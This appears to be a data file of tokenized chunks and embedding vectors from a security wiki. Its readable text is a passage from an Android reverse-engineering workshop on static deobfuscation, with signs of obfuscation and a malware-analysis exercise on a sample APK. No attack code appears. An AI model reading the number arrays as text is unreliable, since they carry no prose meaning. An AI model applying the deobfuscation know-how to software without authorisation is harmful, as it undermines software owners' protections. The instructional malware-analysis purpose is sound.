1026, 1032, 4646, 11924, 1028, 6415, 1004, 2057, 2024, 2183, 2000, 5587, 1996, 2206, 2240, 2065, 2009, 3475, 1005, 1056, 2525, 2045, 1024, 11924, 1024, 6125, 8586, 25137, 8663, 8873, 2290, 1027, 1000, 1030, 20950, 1013, 2897, 1035, 3036, 1035, 9530, 8873, 18259, 12879, 5686, 5815, 1024, 2044, 5815, 1024, 2085, 2175, 2046, 1996, 24501, 1013, 20950, 19622, 1004, 3443, 1013, 19933, 1037, 5371, 2315, 2897, 1035, 3036, 1035, 9530, 8873, 2290, 1012, 20950, 2007, 1996, 2206, 8417, 1024, 1026, 2897, 1011, 3036, 1011, 9530, 8873, 2290, 1028, 1026, 2918, 1011, 9530, 8873, 2290, 1028, 1026, 3404, 1011, 24674, 1028, 1026, 999, 1011, 1011, 3404, 3653, 7076, 9080, 3709, 25222, 1011, 1011, 1028, 1026, 17987, 5034, 2278, 1027, 1000, 2291, 1000, 1013, 1028, 1026, 999, 1011, 1011, 5678, 3404, 5310, 2794, 25222, 1011, 1011, 1028, 1026, 17987, 5034, 2278, 1027, 1000, 5310, 1000, 1013, 1028, 1026, 1013, 3404, 1011, 24674, 1028, 1026, 1013, 2918, 1011, 9530, 8873, 2290, 1028, 1026, 1013, 2897, 1011, 3036, 1011, 9530, 8873, 2290, 1028, 2059, 3828, 1996, 5371, 1004, 2067, 2041, 1997, 2035, 1996, 2472, 3111, 1004, 14591, 1996, 9706, 2243, 2007, 1996, 2206, 3094, 1024, 9706, 25509, 13669, 1038, 1008, 19622, 1011, 2171, 1013, 1008, 1011, 1051, 1008, 6434, 1011, 5371, 1012, 9706, 2243, 1008, 2633, 1010, 2017, 2342, 2074, 2000, 3696, 1996, 2047, 4646, 1012, 3191, 2023, 2930, 1997, 1996, 3931, 15488, 11475, 1011, 21933, 8737, 16281, 1013, 1031, 29226, 1033, 1013, 21953, 2000, 4553, 2129, 2000, 3696, 2009, 1012, 2424, 24728, 19666, 6906, 14680, 2008, 3043, 2087, 2061, 2017, 2064, 8081, 2068, 5514, 1012, 22841, 3162, 2115, 2886, 3302, 1010, 3216, 4013, 19620, 5081, 27404, 1010, 4858, 3314, 2408, 2115, 2878, 6627, 9991, 1010, 2013, 17928, 2015, 2000, 4773, 18726, 1998, 6112, 3001, 1012, 3046, 2009, 2005, 2489, 2651, 1012, 22841, 1064, 2019, 3947, 3238, 18130, 26221, 102 ]
hack_tricks
420.txt
0
[CLS] manual deobfuscationcopied from url ( you can find solutions there ) logothere are many times when the application you ’ re reversing will not be as straight forward as some of the examples we ’ ve discussed. the developer will implement one or more obfuscation techniques to hide the behavior and / or implementation of their app. this can be for both benign and malicious reasons. the key about obfuscation to remember is that if you want to de - obfuscate it, you will be able to. the key decision is not whether or not you can, but whether or not it ’ s worth the resources to de - obfuscate. the reason that you can always de - obfuscate something is because ultimately the cpu at some point has to see the unobfuscated code in order to run it. how to de - obfuscatehow you choose to de - obfuscate the application will depend on the obfuscation method, but there are a couple of common techniques that usually work well. here, we will only touch on the static de - obfuscation techniques since this workshop only covers static analysis / reversing. however, do remember that running the application and dynamically analyzing it can be another great way to get around obfuscation. for obfuscation in the dex bytecode ( java ), one of the easiest ways to statically deobfuscate is to identify the de - obfuscation methods in the application and copy their decompilation into a java file that you then run on the obfuscated file, strings, code, etc. another solution for both java and native code is to transliterate the de - obfuscation algorithm into python or any other scripting language that you ’ re most comfortable. i say “ transliterate ” because it ’ s important to remember that you don ’ t always need to * understand * the de - obfuscation algorithm, you just need a way to execute it. i cover this in more detail in the “ unpacking the packed unpacker ” talk that is linked in the “ more examples ” section. indicators of obfuscationthere are many different types of obfuscation and thus, just as many different types of indicators to alert you as the analyst that an application is likely obfuscated, but here are a few examples with proposed static analysis solutions for deobfuscating. no strings : java and android are highly dependent on strings so if you don ’ t see any or
[ 0.10165198892354965, -0.15508045256137848, -0.29427391290664673, -0.4091276228427887, -0.05961006134748459, -0.3158162534236908, -0.16211046278476715, 0.14773911237716675, 0.3001500070095062, 1.0415892601013184, -0.19102966785430908, -0.06825881451368332, 0.4907352328300476, -0.10064902156591415, -0.46805641055107117, -0.3477324843406677, -0.22862431406974792, -0.23035885393619537, -1.0163763761520386, 0.40350890159606934, 0.3226040005683899, -0.6491960883140564, -1.0065940618515015, -1.1681054830551147, -0.5606530904769897, 0.281414657831192, 0.9323747158050537, 0.16645607352256775, 0.5953486561775208, 0.863216757774353, 0.40866804122924805, 0.07696814090013504, 0.10165440291166306, -0.8549202084541321, 0.4306451976299286, -0.568359911441803, 0.9454397559165955, -0.536868155002594, -0.2729397118091583, -0.4140561819076538, 0.5804798007011414, -0.22442851960659027, 0.07493498176336288, -0.8054989576339722, -0.747839629650116, -0.1808774471282959, -0.10790994018316269, 0.07276591658592224, 0.23073677718639374, 0.21617713570594788, 0.3008691072463989, 0.5335027575492859, 0.1794503629207611, 0.2874007225036621, -0.5178169012069702, 0.08116461336612701, -0.14722038805484772, -0.40274307131767273, -0.9259811639785767, 0.48869597911834717, 0.03838030621409416, 0.38742366433143616, 0.41907647252082825, -0.9434951543807983, 0.5802931785583496, 0.38021427392959595, -0.04667065665125847, 0.22590091824531555, -0.5197426676750183, -0.14735105633735657, 0.04719286412000656, 0.5368288159370422, -0.40540745854377747, -0.5116742253303528, -0.4660924971103668, 0.30093804001808167, -0.021937746554613113, -0.6038758754730225, -0.01534964144229889, 0.8469223380088806, -0.05038314312696457, 0.41074690222740173, 0.3683142066001892, 0.3003542423248291, -0.08756175637245178, -0.6504731774330139, 0.3207341432571411, 0.5940605401992798, -0.4308030903339386, -0.22535498440265656, -0.04900345578789711, 0.31032615900039673, -1.0988337993621826, 0.19374071061611176, 0.8270666599273682, 0.49084246158599854, -0.08580197393894196, 0.3817318379878998, 0.5476945638656616, -0.2993299961090088, 0.3778668940067291, 0.99179607629776, 0.5268781781196594, 0.8496525883674622, 0.11301065236330032, 0.1317209005355835, 0.23361030220985413, -0.15394707024097443, 0.10168962180614471, -0.26469680666923523, 0.3872051537036896, -0.5424683094024658, -0.11033418029546738, -0.5507651567459106, 0.3408113420009613, 0.2916949689388275, 0.27118661999702454, 0.15427005290985107, 0.08273692429065704, -0.06878743320703506, -0.006728456821292639, 0.05656519904732704, 0.31480178236961365, -0.5453023910522461, 0.8081358075141907, 0.03597453609108925, 0.36771199107170105, 0.7046368718147278, -0.7372242212295532, -1.023550033569336, -0.3521181643009186, -0.40462225675582886, 0.431449294090271, 0.8590719699859619, -0.2858485281467438, 0.178281769156456, 0.388174831867218, 0.33533817529678345, 0.6476121544837952, -0.8586559891700745, 0.6253576278686523, -0.004518347326666117, 0.6534821391105652, 1.9210023880004883, 0.19385626912117004, -0.3638263940811157, 0.20334209501743317, 0.1532713770866394, 0.1413881778717041, 1.2354477643966675, -0.054300375282764435, -0.40700244903564453, 1.0393530130386353, -0.4038031995296478, 0.08800002932548523, 0.2572877109050751, -0.8236092329025269, 0.7597342133522034, -0.4991520941257477, 0.23861722648143768, -0.4866850674152374, 0.6830625534057617, -0.5750045776367188, 0.22829920053482056, 0.1057756319642067, 0.6893072724342346, -0.3114049732685089, -0.527863621711731, 0.12294325977563858, 0.39298301935195923, 0.21707910299301147, -0.2679421603679657, 0.18412163853645325, 0.15036526322364807, 2.0384998321533203, 0.9412388205528259, 0.4254710078239441, 0.36593449115753174, -0.06670646369457245, 0.4444219768047333, -0.7218226790428162, 0.606968879699707, -0.2894415855407715, 1.1060363054275513, -0.3171135187149048, 0.22776193916797638, -0.13674750924110413, -0.6128706932067871, -0.09062010794878006, -0.07319898158311844, -0.1259055733680725, 0.9144596457481384, -0.363075852394104, -0.19245754182338715, 0.5193313360214233, 0.37508365511894226, -1.092602252960205, -0.12360689789056778, -0.2438526600599289, -1.7386947870254517, 0.09453646093606949, 0.3245992362499237, -0.5665402412414551, 0.7728829979896545, -0.3327261209487915, 0.0010127860587090254, 0.39662396907806396, 0.7012032866477966, -0.3158601224422455, 0.7012136578559875, 0.18624921143054962, 0.17733852565288544, -0.8205386400222778, -0.12781715393066406, -0.12413337081670761, 0.08480390161275864, -0.23173515498638153, 0.45242324471473694, -0.49649250507354736, -0.29864537715911865, -0.6004895567893982, 0.4266852140426636, 0.6873124241828918, -0.02550986409187317, 0.3329380452632904, -0.0017346885288134217, 0.22254066169261932, 0.6394146084785461, 0.028302591294050217, -0.14907214045524597, 0.21132636070251465, 0.2305816113948822, -0.03519580513238907, 0.6883158087730408, 0.17614024877548218, -0.11100610345602036, 0.5401231646537781, 0.12789781391620636, 0.23127518594264984, -0.38700854778289795, -0.37866508960723877, 1.3855116367340088, 0.7473431825637817, 0.9406147003173828, 0.16800890862941742, 0.3039483428001404, -0.22980672121047974, 0.28376322984695435, 0.149068683385849, 0.4480920135974884, -0.8737165331840515, 1.4554665088653564, 0.5930113792419434, -0.43093395233154297, -1.1166856288909912, -0.23342357575893402, 0.8191654086112976, 1.4721438884735107, -0.9046193957328796, -0.5507655739784241, 0.3234747350215912, -0.17530249059200287, -0.378080815076828, 0.056105565279722214, 0.21595866978168488, 0.09315472096204758, -0.5633226037025452, 0.2094375491142273, -0.4462301433086395, -1.0445283651351929, -0.572339653968811, -0.3191305994987488, -1.3030846118927002, -0.47407376766204834, -0.5219031572341919, 0.038611020892858505, 0.8475087285041809, -0.6513049602508545, -0.04619869217276573, -0.06785260140895844, -0.6092120409011841, -0.4000712037086487, -0.21959549188613892, 1.0160481929779053, 0.9186676740646362, -0.41749268770217896, -0.4902274012565613, 0.4072343111038208, -0.05768031254410744, 1.31256902217865, -0.08927398920059204, -0.2092474102973938, -0.6771504282951355, -0.21117272973060608, 0.3996935784816742, 0.23833498358726501, 0.597096860408783, -0.5759232640266418, -0.293992817401886, -0.05552803352475166, -0.4410155415534973, 0.3765197694301605, 0.10404416173696518, -0.5036237835884094, -0.24991154670715332, 0.9181244373321533, -0.2730862498283386, -0.730323314666748, 0.433968186378479, 0.130277618765831, -0.4954700469970703, 0.5317448973655701, -0.12027323246002197, 1.2287349700927734, -0.9761261343955994, 0.2559795081615448, 0.5845640301704407, -0.05139673873782158, -0.8403093218803406, -0.013429304584860802, 0.0454595573246479, -0.07469668984413147, -0.11733746528625488, -0.5860081315040588, -0.5319958329200745, 0.44124317169189453, -0.049063075333833694, -1.1581437587738037, 0.8380731344223022, -0.22681571543216705, -0.6429523229598999, -0.3210254907608032, -0.02659010887145996, 1.3140382766723633, -0.11120403558015823, 0.4251163601875305, -0.47456347942352295, 0.010330833494663239, -0.5559276342391968, -0.3568607270717621, 0.00976695865392685, -0.7029699683189392, 0.4403340518474579, 0.1767558604478836, 0.37393561005592346, 0.026881037279963493, 0.45678970217704773, -0.7658426761627197, 0.13515160977840424, -0.3070365786552429, -0.9131950736045837, -0.2791999578475952, 0.08624906837940216, 1.062266230583191, 0.6017404198646545, 0.5641584396362305, -0.37182751297950745, -0.15576745569705963, 0.2108040302991867, 0.21269963681697845, 0.6691189408302307, 0.5234689712524414, 0.32381296157836914, 0.046843014657497406, -1.1911709308624268, -0.04081917181611061, -0.2826020419597626, 0.49391090869903564, 0.8556466698646545, -0.13417614996433258, 1.2224935293197632, -0.3856297731399536, -0.8527988195419312, 0.939795732498169, -0.2129979431629181, -0.3219415545463562, 0.6096935868263245, -0.17605803906917572, 0.5151661038398743, -0.43714338541030884, 0.2146514654159546, -0.6568474769592285, -0.408612996339798, 0.2884959876537323, 1.0821514129638672, -0.1555633395910263, 0.09864558279514313, -0.4375578761100769, -0.5090923309326172, -0.25360235571861267, -0.4753512442111969, -0.009170899167656898, 0.5465855598449707, -0.30622807145118713, -0.8110825419425964, -0.5528066158294678, 1.055046796798706, 0.7590338587760925, 0.5967919826507568, 0.2735259532928467, 0.24727267026901245, 0.11540792882442474, -0.17953144013881683, 0.5388153791427612, -0.3835045099258423, -0.37923410534858704, 0.26926007866859436, 0.6143355369567871, -0.38550642132759094, 0.16737787425518036, 0.1594943106174469, -0.27392521500587463, -0.9955272674560547, -0.05597493052482605, -0.17887231707572937, -0.41634687781333923, -0.6052263975143433, 0.1726982444524765, -0.2389805018901825, 0.6110881567001343, -0.7020686864852905, -0.4516811668872833, -0.08324190974235535, 0.4780014455318451, 0.9310376048088074, -0.5391031503677368, -1.2785838842391968, -0.7467636466026306, 0.13069364428520203, 0.15677279233932495, 0.1515009105205536, -0.6413642764091492, -0.32587748765945435, 0.003607033286243677, -0.9118776917457581, -0.16485239565372467, 0.5324587225914001, 0.013674275949597359, 1.005318284034729, -1.0154105424880981, 0.16704271733760834, 0.09610462188720703, -0.948371171951294, -0.34105902910232544, 0.047910191118717194, 0.5650255680084229, 0.19209633767604828, 0.29552385210990906, -0.4102371037006378, -0.34661081433296204, 0.13545048236846924, -0.45597004890441895, 1.0281099081039429, -0.364327609539032, 0.31378379464149475, -0.6218274831771851, -0.4734461009502411, 0.9201387166976929, 0.49105116724967957, -0.5603088736534119, -0.13157394528388977, -0.44316911697387695, 0.40667715668678284, -0.267555832862854, -0.650628924369812, 1.1165515184402466, 0.07292890548706055, -0.8165926933288574, 0.4754467308521271, 0.2920084297657013, -0.10702666640281677, 0.05546959117054939, -0.37744903564453125, -0.4446846842765808, 0.5399200916290283, -1.0826122760772705, 0.2969084084033966, -0.36802682280540466, -0.486783504486084, -0.13884851336479187, -0.06088654696941376, 0.5809160470962524, 0.06594538688659668, -0.3000084459781647, -0.3700214922428131, -0.55644690990448, -0.22185277938842773, 0.07578162103891373, -0.00407025869935751, 0.3126971423625946, 0.30181264877319336, -0.477859765291214, -0.1926441341638565, -0.1786971092224121, -0.3415352404117584, -0.6253317594528198, -0.35472071170806885, -0.1516631543636322, 0.3973981738090515, 0.14001618325710297, 0.21489599347114563, 0.16757293045520782, -0.36266791820526123, 0.32108163833618164, -0.30739012360572815, 0.1850932240486145, -1.1285414695739746, -0.17983730137348175, -0.6751421093940735, 0.10005748271942139, 0.2238408774137497, 0.26980695128440857, 0.07220250368118286, -0.6312615275382996, 0.5216867923736572, 0.4715587794780731, 0.4944974184036255, -0.02898319624364376, -0.25989654660224915, 1.3804433345794678, -0.30243682861328125, -0.6852200031280518, 0.049797553569078445, 0.469119131565094, 0.8182432651519775, -0.5505278706550598, -0.20643948018550873, -0.23990556597709656, -1.4482853412628174, -0.43261805176734924, 0.1941787153482437, -0.17403075098991394, 0.34106144309043884, -1.0335060358047485, -0.26681751012802124, -0.49876871705055237, 0.10317938029766083, 0.04292669519782066, -1.2373985052108765, 0.1396072804927826, -0.7287423014640808, 0.6785587072372437, 0.15932796895503998, -0.5882760286331177, -0.1897270530462265, 0.02261148951947689, 0.20873333513736725, 0.7487043738365173, 0.4142759442329407, -0.08539076149463654, 0.4534189999103546, -0.0764770656824112, 0.06352517008781433, 0.4679468870162964, -0.23216690123081207, -0.5430691838264465, 0.20991913974285126, -0.053759511560201645, -0.2530655562877655, 1.05274498462677, 0.016323799267411232, 0.3885813355445862, -0.10969804972410202, 0.38425010442733765, 0.016355793923139572, -0.17192776501178741, -0.8090712428092957, -0.14578498899936676, 0.8090916872024536, -0.314513623714447, 0.08126812428236008, -0.012029693461954594, 0.23313573002815247, 0.7374333739280701, 0.07478184998035431, -0.3954002261161804, 0.29724758863449097, -0.46209627389907837, -1.6062626838684082, 0.5303078293800354, -0.6055360436439514, -0.38285982608795166, -0.47080516815185547, -0.5575358867645264, 0.6582343578338623, -0.5151997208595276, -0.17185644805431366, 0.8544478416442871, 0.9297942519187927, 0.273884654045105, -0.3615123927593231, 0.6746390461921692, 0.1901814043521881, -0.18776004016399384, -0.23049701750278473, -0.017758168280124664, -0.38848012685775757, -0.0929144099354744, 0.4745243787765503, -0.3358636796474457, -1.3561056852340698, -0.023719683289527893, 0.36545324325561523, -0.8754554390907288, 0.6006093621253967, 0.08181530237197876, -1.0634570121765137, -0.10394635051488876, 0.23465044796466827, 0.05029098689556122, -0.36855435371398926, 0.6799458861351013, 0.3986590504646301, 0.2637033760547638, -0.054578378796577454, -0.08272872865200043, -0.5470603704452515, 0.2171892523765564, 0.455829918384552, -0.43261703848838806, 0.17428849637508392, 0.23954343795776367, 0.5439885258674622, -1.552113652229309, -0.6601824164390564, -1.0159355401992798, 0.21414761245250702, 0.03519385680556297, -1.1211705207824707, -0.4880160689353943, -0.16570134460926056, 0.3605912923812866, 0.16070348024368286, 0.4779053330421448, -0.4967200458049774, -0.03461812436580658, -0.33614322543144226, -0.0733637809753418, 0.07447811216115952, 0.18213848769664764, 0.06135629117488861, -0.018062667921185493, -0.5303987264633179, -1.3029096126556396, 0.3334622383117676, -0.26811057329177856, 0.28646761178970337, 0.9820337891578674, 0.13889610767364502, 0.25757086277008057, 0.31079748272895813, -0.09828326851129532, 0.3706831634044647, -0.07064075767993927, 0.41565224528312683, 0.6447696685791016, -0.2174724042415619, -0.8275165557861328, -0.5095723271369934, 0.5405774116516113, 0.08737368136644363, 0.9060489535331726, -0.506756603717804, -0.3523401618003845, -0.17395146191120148, 0.4438832104206085, 0.04196222871541977, -0.7460029125213623, -0.10061471909284592, -0.836353600025177, -0.16300861537456512, 0.7295212745666504, 0.1424901783466339, -0.45945876836776733, 0.09465499967336655, 0.07956066727638245, -0.03538992255926132, -0.8460971713066101, 0.18540236353874207, -0.2697339951992035, 0.19654300808906555, 0.04970663785934448, -0.21587708592414856, -1.1101058721542358, -0.905500054359436, -0.28205493092536926, -0.3693455457687378, 0.1180601567029953, -0.3266032636165619, -0.2214185744524002, -0.29692164063453674, -0.8670750856399536, -0.132377490401268, -0.7339120507240295, 0.9568753838539124, 0.5621539950370789, -0.5127165913581848, 0.2978837788105011, 0.32232314348220825, -0.5902577042579651, 0.9549943208694458, -0.01815156824886799, -0.0009013183298520744, 0.22791466116905212, -1.0587596893310547, 0.5489420890808105, -0.28700339794158936, 0.2721242606639862, -0.7558063864707947, 0.12433065474033356, 0.044555146247148514, -0.09019453823566437, -0.6156316995620728, -0.1756235808134079, -0.2487127035856247, -0.8617672324180603, 0.14838646352291107, -0.31552937626838684, 0.09133149683475494, 0.018235517665743828, 0.9324555397033691, -0.06894854456186295, 0.4530911147594452, -0.6491451263427734, 0.23137512803077698, 0.7140218615531921, 0.13035200536251068, 0.29614001512527466, 0.6016577482223511, 0.7860335111618042, -0.324016273021698, 0.16521412134170532, 0.333469033241272, -0.19833506643772125, 0.3384758532047272, -0.2457982450723648, -0.25184109807014465, -0.1970042586326599, 0.011396202258765697, 0.37949642539024353, -0.08202671259641647, 0.3248072862625122, -0.4791300892829895, -0.18878746032714844, 0.058166928589344025, -0.7203679084777832, -0.21537868678569794, -0.7628159523010254, -0.040672384202480316, -0.18704897165298462, -0.673900842666626, -0.2239372581243515, 0.028490420430898666, -0.18131977319717407, 0.06396979093551636, -0.42667505145072937, -0.339100182056427, 0.33230704069137573, 0.2025512158870697, 0.05769087001681328, 0.47665202617645264, -1.041013240814209, -1.07545804977417, -0.27529051899909973, 0.4196608364582062, -0.21479856967926025, -1.2812423706054688, 0.0598687119781971, 0.8750562071800232, 0.3600727617740631, 0.08713375777006149, -0.6369013786315918, 0.28710007667541504, 0.19771596789360046, 0.26409828662872314, -0.2129652053117752, 0.2520526349544525, -0.49132147431373596, 1.0760399103164673, -0.5256462693214417, 0.31128430366516113, 0.18837541341781616, -0.42377597093582153, 0.018225669860839844, 0.258510559797287, -0.4491128921508789, 1.0006133317947388, 0.3120875656604767, 0.1540144383907318, 0.7461063265800476, 0.5086562037467957, 0.30255675315856934, 0.10375948995351791, -0.18284104764461517, -0.45960313081741333, 0.47667303681373596, 0.2451590746641159, 0.31786152720451355, 0.12863150238990784, 0.5353562235832214, 0.4734731614589691, -0.7017442584037781, -0.5106400847434998, -0.13865207135677338, -0.07915309071540833, -0.6716137528419495, -0.7646151185035706, -0.6080270409584045, -0.330905556678772, 0.21405638754367828, -0.09186108410358429, 0.37066715955734253, -0.556698203086853, 0.37161457538604736, -0.5092027187347412, 0.0058604138903319836, 0.9409904479980469, -0.5626875758171082, 0.9924148321151733, 0.16585925221443176, 0.10755414515733719, 0.40049710869789124, 0.5746318697929382, -1.2215968370437622, -0.04592014476656914, 1.1487730741500854, -0.04356781020760536, -0.43262967467308044, 0.23364976048469543, 0.02612294815480709, -0.25958460569381714, 0.4431656301021576, 0.3950289487838745, -0.44986414909362793, -0.07238021492958069, 0.3717205226421356, -0.37437722086906433, -1.4063358306884766, 0.4953777492046356, 0.06756598502397537, -0.8493431210517883, 0.33506688475608826, -0.1245126947760582, 0.8810269832611084, -0.2705909013748169, 0.36707985401153564, 0.07738605886697769, 0.36325913667678833, 0.2562503516674042, 0.0016574534820392728, -0.9038365483283997, 0.9547873139381409, -0.08954797685146332, 0.7747859954833984, -0.0182559285312891, 1.033464789390564, -0.009212103672325611, 0.8026653528213501, 0.4113350212574005, -0.8418582677841187, 0.5330820083618164, -0.06114624813199043, -0.26760566234588623, -0.3633395731449127, -0.627081573009491, -0.39747241139411926, 0.6124004125595093, -0.11761697381734848, -0.04908327758312225, -0.7339564561843872, -0.003734165569767356, -0.8230644464492798, 0.07704944163560867, 0.4332491457462311, -0.17614048719406128, -0.7308791875839233, -0.05894719809293747, 0.6684542894363403, 0.7107042670249939, 0.02436218038201332, -0.17049486935138702, -0.5204382538795471, -0.6057637333869934, 0.3347106873989105, -0.73610919713974, 1.151097297668457, -0.24516412615776062, -0.8569190502166748, -0.09267814457416534, -0.7435675859451294, -0.34294503927230835, -0.33150050044059753, -0.40289968252182007, -0.565199613571167, 0.6947654485702515, 0.7464469075202942, 0.4572117030620575, 0.5397764444351196, -0.2854865789413452, -0.33906668424606323, 0.3374362289905548, 0.8650270700454712, -0.4850543737411499, 0.7490674257278442, 0.7746607065200806, 0.3380463421344757, 0.37375807762145996, 0.8336791396141052, 0.5211811065673828, -1.131705403327942, -0.35873860120773315, 0.7204369306564331, 0.14198362827301025, -0.8512804508209229, -0.4685136079788208, -0.18906690180301666, -0.05607430636882782, -0.3457094430923462, 0.12200982868671417, -1.164530634880066, -0.207602396607399, -0.8011289238929749, 0.0590100958943367, 0.09780781716108322, 0.2975255250930786, 0.17232371866703033, 0.4177638590335846, 0.5800856947898865, -1.3336167335510254, 4.063473224639893, 0.13525605201721191, -0.09722192585468292, -0.09015321731567383, 0.5631575584411621, 0.5786700248718262, -0.17544735968112946, -0.956193745136261, 0.3102028965950012, -0.13250111043453217, 0.5950161218643188, -0.4908343553543091, 0.3166784942150116, 0.6562995910644531, -0.6045500636100769, -0.03855499252676964, -0.6998213529586792, 0.06556101888418198, 0.7060293555259705, -0.7608532309532166, -0.5345771312713623, 0.23677197098731995, -0.009449866600334644, 0.029897253960371017, 0.7194733023643494, -0.14244398474693298, 0.6105872988700867, -0.3798344135284424, 0.26184430718421936, -0.0805235281586647, 0.6107812523841858, 0.12988269329071045, 0.04276355728507042, -0.5453722476959229, -0.17889076471328735, -0.0328805111348629, -0.34949707984924316, -0.8413146138191223, -0.26372241973876953, 0.21632610261440277, 0.38088828325271606, 0.6150960326194763, 0.18274696171283722, -0.7185845971107483, 0.11314625293016434, -0.20256417989730835, -0.6885722279548645, 0.38297832012176514, 0.06660877913236618, -0.5674566626548767, 0.03115255758166313, -0.20747461915016174, 0.5142512917518616, 0.04002060368657112, -0.5348197221755981, 0.2225494384765625, 0.16617503762245178, -0.4609612822532654, -0.08077908307313919, -0.22222894430160522, -0.26936495304107666, -0.32216495275497437, 0.3402228355407715, 0.3046654164791107, -1.1172213554382324, 0.06289870291948318, 0.22856047749519348, 0.6455463171005249, -0.008481092751026154, 0.25214189291000366, 0.13387861847877502, -0.19229426980018616, 0.15425117313861847, 0.1881931722164154, 1.0610498189926147, 0.40998631715774536, -0.17275699973106384, 0.2680131494998932, 0.16788561642169952, -0.4745471179485321, 0.48734721541404724, -1.051639199256897, -0.5441927313804626, 0.11203387379646301, 0.362024188041687, 0.6009165644645691, -0.40473389625549316, -0.16309939324855804, 0.07297908514738083, 0.511676549911499, 0.4779220223426819, 0.4509294331073761, 0.12996883690357208, 0.5057269930839539, 0.5024725794792175 ]
[ 101, 6410, 2139, 16429, 25608, 10719, 3597, 14756, 2094, 2013, 24471, 2140, 1006, 2017, 2064, 2424, 7300, 2045, 1007, 8154, 12399, 2063, 2024, 2116, 2335, 2043, 1996, 4646, 2017, 1521, 2128, 7065, 2545, 2075, 2097, 2025, 2022, 2004, 3442, 2830, 2004, 2070, 1997, 1996, 4973, 2057, 1521, 2310, 6936, 1012, 1996, 9722, 2097, 10408, 2028, 2030, 2062, 27885, 25608, 10719, 5461, 2000, 5342, 1996, 5248, 1998, 1013, 2030, 7375, 1997, 2037, 10439, 1012, 2023, 2064, 2022, 2005, 2119, 28378, 1998, 24391, 4436, 1012, 1996, 3145, 2055, 27885, 25608, 10719, 2000, 3342, 2003, 2008, 2065, 2017, 2215, 2000, 2139, 1011, 27885, 25608, 16280, 2009, 1010, 2017, 2097, 2022, 2583, 2000, 1012, 1996, 3145, 3247, 2003, 2025, 3251, 2030, 2025, 2017, 2064, 1010, 2021, 3251, 2030, 2025, 2009, 1521, 1055, 4276, 1996, 4219, 2000, 2139, 1011, 27885, 25608, 16280, 1012, 1996, 3114, 2008, 2017, 2064, 2467, 2139, 1011, 27885, 25608, 16280, 2242, 2003, 2138, 4821, 1996, 17368, 2012, 2070, 2391, 2038, 2000, 2156, 1996, 27776, 29292, 2271, 12921, 3642, 1999, 2344, 2000, 2448, 2009, 1012, 2129, 2000, 2139, 1011, 27885, 25608, 16280, 14406, 2017, 5454, 2000, 2139, 1011, 27885, 25608, 16280, 1996, 4646, 2097, 12530, 2006, 1996, 27885, 25608, 10719, 4118, 1010, 2021, 2045, 2024, 1037, 3232, 1997, 2691, 5461, 2008, 2788, 2147, 2092, 1012, 2182, 1010, 2057, 2097, 2069, 3543, 2006, 1996, 10763, 2139, 1011, 27885, 25608, 10719, 5461, 2144, 2023, 8395, 2069, 4472, 10763, 4106, 1013, 7065, 2545, 2075, 1012, 2174, 1010, 2079, 3342, 2008, 2770, 1996, 4646, 1998, 8790, 3973, 20253, 2009, 2064, 2022, 2178, 2307, 2126, 2000, 2131, 2105, 27885, 25608, 10719, 1012, 2005, 27885, 25608, 10719, 1999, 1996, 20647, 24880, 16044, 1006, 9262, 1007, 1010, 2028, 1997, 1996, 25551, 3971, 2000, 10763, 3973, 2139, 16429, 25608, 16280, 2003, 2000, 6709, 1996, 2139, 1011, 27885, 25608, 10719, 4725, 1999, 1996, 4646, 1998, 6100, 2037, 21933, 8737, 29545, 2046, 1037, 9262, 5371, 2008, 2017, 2059, 2448, 2006, 1996, 27885, 25608, 12921, 5371, 1010, 7817, 1010, 3642, 1010, 4385, 1012, 2178, 5576, 2005, 2119, 9262, 1998, 3128, 3642, 2003, 2000, 28468, 22139, 1996, 2139, 1011, 27885, 25608, 10719, 9896, 2046, 18750, 2030, 2151, 2060, 5896, 2075, 2653, 2008, 2017, 1521, 2128, 2087, 6625, 1012, 1045, 2360, 1523, 28468, 22139, 1524, 2138, 2009, 1521, 1055, 2590, 2000, 3342, 2008, 2017, 2123, 1521, 1056, 2467, 2342, 2000, 1008, 3305, 1008, 1996, 2139, 1011, 27885, 25608, 10719, 9896, 1010, 2017, 2074, 2342, 1037, 2126, 2000, 15389, 2009, 1012, 1045, 3104, 2023, 1999, 2062, 6987, 1999, 1996, 1523, 4895, 23947, 2075, 1996, 8966, 4895, 23947, 2121, 1524, 2831, 2008, 2003, 5799, 1999, 1996, 1523, 2062, 4973, 1524, 2930, 1012, 20390, 1997, 27885, 25608, 10719, 12399, 2063, 2024, 2116, 2367, 4127, 1997, 27885, 25608, 10719, 1998, 2947, 1010, 2074, 2004, 2116, 2367, 4127, 1997, 20390, 2000, 9499, 2017, 2004, 1996, 12941, 2008, 2019, 4646, 2003, 3497, 27885, 25608, 12921, 1010, 2021, 2182, 2024, 1037, 2261, 4973, 2007, 3818, 10763, 4106, 7300, 2005, 2139, 16429, 25608, 18252, 1012, 2053, 7817, 1024, 9262, 1998, 11924, 2024, 3811, 7790, 2006, 7817, 2061, 2065, 2017, 2123, 1521, 1056, 2156, 2151, 2030 ]
hack_tricks
421.txt
0
only scrambled strings, it ’ s highly likely the strings are obfuscated. suggested solution : look for method calls that take strings as an argument and trace back where that argument is coming from. at some point the string argument will be going through a deobfuscation method before it ’ s passed to the api that takes the string argument. scrambled strings : the java and android apis require the plain text strings, not scrambled. suggested solution : the scrambled strings are all likely passed to the same methods prior to being passed to the apis. these methods are likely the deobfuscation methods. binary files in the assets / directory and dexclassloader calls in the app : likely unpacking and loading additional code. ( could also be downloading from a remote location and then loading using dexclassloader ) suggestion solution : identify where the file is read and then follow the path. it is likely deobfuscated quickly after being read. native libraries - can ’ t identify the jni functions ( no funcs named java _ and no calls to registernatives ) : in order to execute any native methods, jni has to be able to pair the function in the native library with the native method declaration in java and thus one of the two must exist at some point. suggested solution : start at jni _ onload method and look for a de - obfuscation routine that loads additional code. exercise 7 - string deobfuscationin this exercise, we will practice de - obfuscating strings in order to analyze an application. for the exercise we will use the sample at ~ / samples / clashoflights. apk in the vm. this sample has the sha256 digest c403d2dcee37f80b6d51ebada18c409a9eae45416fe84cd0c1ea1d9897eae4e5. goalsto identify obfuscated strings and develop a solution to deobfuscate it. exercise contextyou are a malware analyst reviewing this application to determine if it ’ s malware. you come across an obfuscated javascript string that is being loaded and need to deobfuscate it to determine whether or not the application is malicious. you can ’ t run the application dynamically and need to determine what the javascript is statically. instructions1. find the string that you need to de - obfuscate2. identify the routine that de - obfuscates it
